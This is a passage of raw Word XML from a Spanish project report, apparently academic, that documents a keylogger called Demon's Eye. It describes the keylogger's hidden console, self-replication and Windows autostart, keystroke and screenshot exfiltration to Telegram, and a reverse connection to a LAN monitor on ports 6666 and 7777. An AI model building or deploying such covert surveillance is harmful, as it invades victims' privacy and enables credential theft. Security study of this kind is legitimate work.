      <w:r w:rsidR="00C62DDD">
        <w:t>, que definirá el tamaño del fichero de registro de teclas. Una vez superado este tamaño se enviará este archivo a los diferentes servicios que se hayan establecido y se generará un nuevo archivo de registro con otro nombre.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C62DDD" w:rsidRDefault="00C62DDD" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los archivos de datos del keylogger se generarán siempre en la carpeta de archivos temporales de Windows y cada vez con nombres aleatorios diferentes, con </w:t>
      </w:r>
      <w:r w:rsidR="00EC4C40">
        <w:t xml:space="preserve">la salvedad de que tendrán un </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:t xml:space="preserve">prefijo definido, en este caso </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="003008A3" w:rsidRPr="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>klg_</w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:t>» y una extensión concreta «</w:t>
      </w:r>
      <w:r w:rsidR="003008A3" w:rsidRPr="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>.dek</w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00EC4C40">
        <w:t>. Este prefijo y extensión están definidos como constantes en código.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007540F1" w:rsidRDefault="007540F1" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La consola se oculta por defecto, pues como todo keylogger, su objetivo es mantenerse oculto y pasar desapercibido, pero se ha establecido un parámetro opcional en el programa para no ocultar la </w:t>
      </w:r>
      <w:r w:rsidR="00BC2703">
        <w:t>consola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y poder depurar el funcionamiento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC2703" w:rsidRDefault="00BC2703" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>También se ha establecido una opción para que la aplicación se replique automáticamente y se</w:t>
      </w:r>
      <w:r w:rsidR="00192FFD">
        <w:t xml:space="preserve"> ejecute automáticamente en cada nuevo inicio de Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007540F1" w:rsidRDefault="00F40B51" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Existe también un sencillo monitor de red, el cual busca el keylogger dentro de un rango de red, y si lo encuentra activa en el keylogger el envío de las pulsaciones de tecla</w:t>
      </w:r>
      <w:r w:rsidR="008F777C">
        <w:t>do al mon</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="008F777C">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>or.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6074" w:rsidRDefault="00FC6074" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Para el funcionamiento del monitor se establece un servidor que funciona como thread independiente que está en escucha constante a la espera de que el monitor contacte con el keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6074" w:rsidRDefault="00FC6074" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Se utilizan otras funciones con threads, como la captura de pantalla y envío de esta a Telegram</w:t>
      </w:r>
      <w:r w:rsidR="00066B88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A67B7" w:rsidRPr="007A67B7" w:rsidRDefault="007A67B7" w:rsidP="00A37EB8">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Otra característica es la posibilidad de desactivación del keylogger mediante una combinación de teclas. Por defecto se establece que la combinación </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67B7">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[CTRL]+F</w:t>
      </w:r>
      <w:r>
        <w:t>» desactivará los hooks y finalizará la aplicación sin mostrar ningún mensaje en pantalla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004396D" w:rsidRDefault="0004396D" w:rsidP="0004396D">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="_Toc18453536"/>
      <w:bookmarkStart w:id="251" w:name="_Toc19810091"/>
      <w:r>
        <w:t>Parámetros de la aplicación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w:rsidR="0004396D" w:rsidRDefault="0004396D" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>La aplicación solo requiere de un solo parámetro obligatorio para funcionar,</w:t>
      </w:r>
      <w:r w:rsidR="00700525">
        <w:t xml:space="preserve"> ya que en la mayoría de opciones establece valores por defecto o sirven para depurar. T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ecleando el parámetro </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-</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734876">
        <w:t>para evitar que nadie ejecute la aplicación y se le instale el keylogger sin percatarse de ello</w:t>
      </w:r>
      <w:r w:rsidR="00EC0171">
        <w:t>.</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003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0E86">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nos permite indicar la frecuencia de capturas de pantalla que se ejecutará después de un número determinado de pulsaciones de teclado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700525" w:rsidRDefault="00700525" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El parámetro </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00700525">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> establece el buffer mínimo de caracteres en memoria. Es decir, cuando se supera este valor se graban los datos a disco para evitar constantes escrituras a cada pulsación de tecla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0E86" w:rsidRDefault="006C0E86" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El parámetro </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00700525">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> define el tamaño del fichero de datos de captura de teclas. Cuando llega al tamaño indicado (o lo supera), este fichero es enviado a los servicios que se hayan definido y se genera un nuevo archivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700525" w:rsidRDefault="006C0E86" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El parámetro </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0E86">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>--noscreenshot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> desactiva la función de captura de pantalla. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0E86" w:rsidRDefault="00700525" w:rsidP="00B50DBE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los parámetros </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3B50">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="009E3B50">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> establecen el nivel de detalle de información generada, y que se active el </w:t>
      </w:r>
      <w:r w:rsidR="009E3B50">
        <w:t>volcado a fichero, respectivamente.</w:t>
      </w:r>
      <w:r w:rsidR="006C0E86">
        <w:t xml:space="preserve">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003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6467">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (o </w:t>
      </w:r>
      <w:r w:rsidR="003008A3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>--</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700525" w:rsidP="00700525">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B80A599" wp14:editId="115DDFC3">
            <wp:extent cx="4392000" cy="4183200"/>
            <wp:effectExtent l="114300" t="114300" r="104140" b="1416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3339"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4392000" cy="418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bookmarkStart w:id="252" w:name="_Toc19358251"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>112</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Parámetros de línea de comandos de Demon</w:t>
      </w:r>
      <w:r w:rsidR="00EC0171">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s Eye Keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="252"/>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7246EB" w:rsidRDefault="007246EB" w:rsidP="007246EB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="_Toc18453537"/>
      <w:bookmarkStart w:id="254" w:name="_Toc19810092"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Replicación y autoarranque</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
      <w:bookmarkEnd w:id="254"/>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595DF502" wp14:editId="048D3E46">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bookmarkStart w:id="255" w:name="_Toc19358252"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>113</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de keylogger replicado y añadido al registro de Windows.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="255"/>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56" w:name="_Toc18453538"/>
      <w:bookmarkStart w:id="257" w:name="_Toc19810093"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>El Hook</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
      <w:bookmarkEnd w:id="257"/>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r w:rsidR="00786B3D">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esto es solo una solución que sirve para demostrar simplemente las diferencias entre estos dos módulos, ya que, aunque pyntput soluciona el problema de los acentos, no lo hace para todos los caracteres especiales, pues al escribir caracteres</w:t>
      </w:r>
      <w:r w:rsidR="00982D0E">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> con diéresis (ä ë ü) o con acento circunflejo (â û î) los pone igualmente acentuados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00734876" w:rsidRDefault="00734876" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Así pues, si no se indica nada utilizará el primer método, pero si especificamos el parámetro «</w:t>
      </w:r>
      <w:r w:rsidRPr="00734876">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>–m1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>» utilizará el módulo pynput para la captura de eventos del teclado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00955232" w:rsidRDefault="00955232" w:rsidP="00955232">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="399AB02A" wp14:editId="7E64FF97">
            <wp:extent cx="4438800" cy="1897200"/>
            <wp:effectExtent l="133350" t="114300" r="114300" b="1416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54" b="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="44388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5232" w:rsidRDefault="00955232" w:rsidP="00955232">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_Toc19358253"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>114</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra del contenido registrado en el fichero de datos del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w:rsidR="00982D0E" w:rsidRDefault="0036163A" w:rsidP="0036163A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc19810094"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">El Servidor </w:t>
      </w:r>
      <w:r w:rsidR="00DC3495">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>del keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:p w:rsidR="0036163A" w:rsidRDefault="0036163A" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>El servidor se establece funcionando como un thread independiente que está en escucha permanente en un puerto definido en una constante (por defecto 6666)</w:t>
      </w:r>
      <w:r w:rsidR="00057AE1">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> y cuando recibe la comunicación del monitor, establece una comunicación inversa</w:t>
      </w:r>
      <w:r w:rsidR="00DC3495">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> y se invierten los papeles</w:t>
      </w:r>
      <w:r w:rsidR="00057AE1">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>, es decir, el keylogger hace de cliente enviando los datos al monitor sobre otro puerto (por defecto 7777)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003008A3" w:rsidRDefault="003008A3" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00057AE1" w:rsidRDefault="00057AE1" w:rsidP="00057AE1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_Toc19810095"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>El Monitor del keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
    </w:p>
    <w:p w:rsidR="00057AE1" w:rsidRDefault="00011DDF" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">El keylogger </w:t>
      </w:r>
      <w:r w:rsidR="002F50C3">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>envía</w:t>
      </w:r>
      <w:r w:rsidR="00057AE1">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> datos al monitor solo si este se identifica correctamente. El programa monitor se ha definido como un sencillo monitor en modo consola y puede recibir también varios parámetros.</w:t>
      </w:r>
      <w:r w:rsidR="00234519">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se planteó inicialmente con la opción de buscar el keylogger en una red local, ya que teóricamente se desconoce la ip del equipo donde está el keylogger, por lo tanto, existe inicialmente un proceso de búsqueda por la red enviando un paquete con un mensaje concreto para identificarse. El keylogger al reconocer el monitor envía la respuesta y entonces el monitor queda a la espera de recibir los datos del keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1A4C" w:rsidRDefault="000D1A4C" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Así, si tenemos un equipo con el keylogger en la misma red local, lanzando el siguiente comando, haría una búsqueda y activaría la recepción de datos del keylogger. Si no se especifica el parámetro «-e» simplemente nos informa de si encuentra un keylogger (o más) en el rango de red escaneado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1A4C" w:rsidRDefault="000D1A4C" w:rsidP="000D1A4C">
      <w:pPr>
        <w:pStyle w:val="Citadestacada"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D1A4C">
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>demonseye-net-search.exe  -e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00234519" w:rsidRDefault="001C6606" w:rsidP="009B063F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Una vez establecida la comunicación el monitor recibirá lo que el usuario teclee e información de la ventana o aplicación activa. Nada más.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F50C3" w:rsidRDefault="000D1A4C" w:rsidP="002F50C3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03AE36E0" wp14:editId="4D7BDBF5">
            <wp:extent cx="4672800" cy="2480400"/>
            <wp:effectExtent l="133350" t="133350" r="14732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987" b="2079"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4672800" cy="248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F50C3" w:rsidP="002F50C3">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="_Toc19358254"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>115</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de monitor después de buscar keylogger y empezando a recibir datos.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
    </w:p>
    <w:p w:rsidR="00DC3495" w:rsidRPr="00DC3495" w:rsidRDefault="00DC3495" w:rsidP="00DC3495">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">El monitor permite establecer otros parámetros, aunque no son imprescindibles y se han usado básicamente para pruebas y experimentación en red. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00234519" w:rsidRDefault="00057AE1" w:rsidP="00234519">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23B222C4" wp14:editId="03EC8E1A">
            <wp:extent cx="3887406" cy="4035425"/>
            <wp:effectExtent l="114300" t="114300" r="132715" b="136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96"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3888000" cy="4036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34519" w:rsidP="00234519">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="_Toc19358255"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>116</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Parámetros de línea de comandos del buscador y monitor del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="262"/>
    </w:p>
    <w:p w:rsidR="00832B5C" w:rsidRDefault="00832B5C" w:rsidP="001C6606">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc19810096"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Captura de pantalla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
    </w:p>
    <w:p w:rsidR="00832B5C" w:rsidRDefault="00314A87" w:rsidP="00832B5C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Se incluye también la característica de captura de pantalla que se efectúa automáticamente cada x pulsaciones de teclado. Por defecto es cada 100 pulsaciones, pero este valor mediante el parámetro «</w:t>
      </w:r>
      <w:r w:rsidRPr="007D572F">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>-k número</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">». Cada captura de pantalla se guarda en un fichero en la carpeta temporal del usuario con el prefijo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>«scr_» seguido de la fecha y hora en formato “</w:t>
      </w:r>
      <w:r w:rsidRPr="00314A87">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>aammddhhmmss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>” y con la extensión «.png».</w:t>
      </w:r>
    </w:p>
